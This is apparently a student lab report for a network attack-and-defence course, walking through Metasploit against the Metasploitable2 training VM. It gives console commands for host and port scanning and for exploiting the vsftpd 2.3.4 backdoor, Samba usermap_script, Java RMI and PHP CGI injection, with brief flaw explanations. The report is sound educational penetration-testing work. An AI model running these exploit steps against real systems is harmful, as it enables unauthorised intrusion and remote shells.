20222311 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告

Petrichor666發表於2024-11-16

1.實驗內容
1.1 本週學習內容回顧
使用了Metasploit框架,其是一個功能強大的滲透測試框架。在使用的過程當中,Metasploit 提供了種類繁多的攻擊模組,涵蓋了遠端程式碼執行、服務拒絕、提權等多種攻擊方式,支援對多種作業系統和應用程式進行測試。除了漏洞利用,它還具備強大的後滲透功能,如鍵盤記錄、檔案上傳下載、網路嗅探等。
其次還使用了一些資訊收集的工具,如nmap,Nessus等,用於漏洞檢測、資訊收據等操作。

1.2 實驗要求
本實踐目標是掌握metasploit的用法。
指導書參考Rapid7官網的指導教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下載官方靶機Metasploitable2,完成實驗內容。
查詢靶機IP地址,得到結果為192.168.134.142

2.實驗過程
2.1 前期滲透
2.1.1 主機發現
(可用Aux中的arp_sweep,search一下就可以use)
search arp_sweep
use 0
set RHOSTS 192.168.134.0/24
set THREADS 30
run

成功查詢到靶機(192.168.134.142)
2.1.2 埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等
search portscan/tcp
set RHOSTS 192.168.134.142
run


成功掃描出開放的tcp埠。
2.1.3 掃描系統版本、漏洞
search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.134.142
run

目標主機執行的是一個較舊的 Samba 版本(3.0.20),且使用 SMBv1,可能存在一些已知漏洞。
2.2 Vsftpd原始碼包後門漏洞(21埠)
漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.134.142
exploit
run攻擊成功執行後,再輸入uname –a、 pwd、 id等命令 驗證。


2.3 SambaMS-RPC Shell命令注入漏洞(埠139)
漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.134.142

利用成功 執行uname–a驗證

2.4 Java RMI SERVER命令執行漏洞(1099埠)
漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。
首先檢視1099埠是否開啟

根據之前的TCP掃描結果,可以看出1099埠是開放的。
search exploit/multi/misc/java_rmi_server
use 0
show options //檢視配置引數
set RHOST 192.168.134.142
exploit

執行成功,輸入shell
利用whoami命令驗證,得到結果root。

2.5 PHP CGI引數執行注入漏洞(80埠)
漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.134.142
exploit

攻擊成功,輸入dir驗證。

3.問題及解決方案
問題一:一開始kali虛擬機器無法ping通靶機
解決方案:把兩個虛擬機器的網路介面卡都設定為NAT模式
4.學習感悟、思考等

  • 透過這次網路攻防實驗,我深刻體會到了網路安全的重要性以及攻防技術的複雜性。實驗中,我們從基礎的主機發現和埠掃描開始,逐步深入到具體的漏洞利用,每一個步驟都讓我對網路安全有了更深入的認識。
  • 首先,主機發現和埠掃描是滲透測試的基礎,它們幫助我們瞭解目標網路的佈局和開放的服務。這些資訊對於後續的漏洞掃描和利用至關重要。使用工具如nmap進行埠掃描,不僅可以發現開放的埠,還可以識別執行在這些埠上的服務及其版本資訊,為後續的漏洞分析提供線索。
  • 接著,我們接觸到了具體的漏洞利用。Vsftpd後門漏洞、SambaMS-RPC Shell命令注入漏洞、Java RMI SERVER命令執行漏洞以及PHP CGI引數執行注入漏洞,每一個漏洞都展示了不同服務在設計或配置上的安全缺陷。這些漏洞的存在,不僅威脅到了資訊系統的安全,也提醒我們作為網路空間安全專業的學生,需要不斷地更新知識,跟進最新的安全動態。
  • 在實際操作中,我學會了如何使用Metasploit框架來利用這些漏洞。Metasploit的強大功能讓我能夠快速地找到並利用漏洞,但同時也讓我意識到,這樣的工具如果落入惡意攻擊者手中,後果將不堪設想。因此,安全防禦不僅要關注技術層面,還要加強對攻擊工具的管理和控制。

相關文章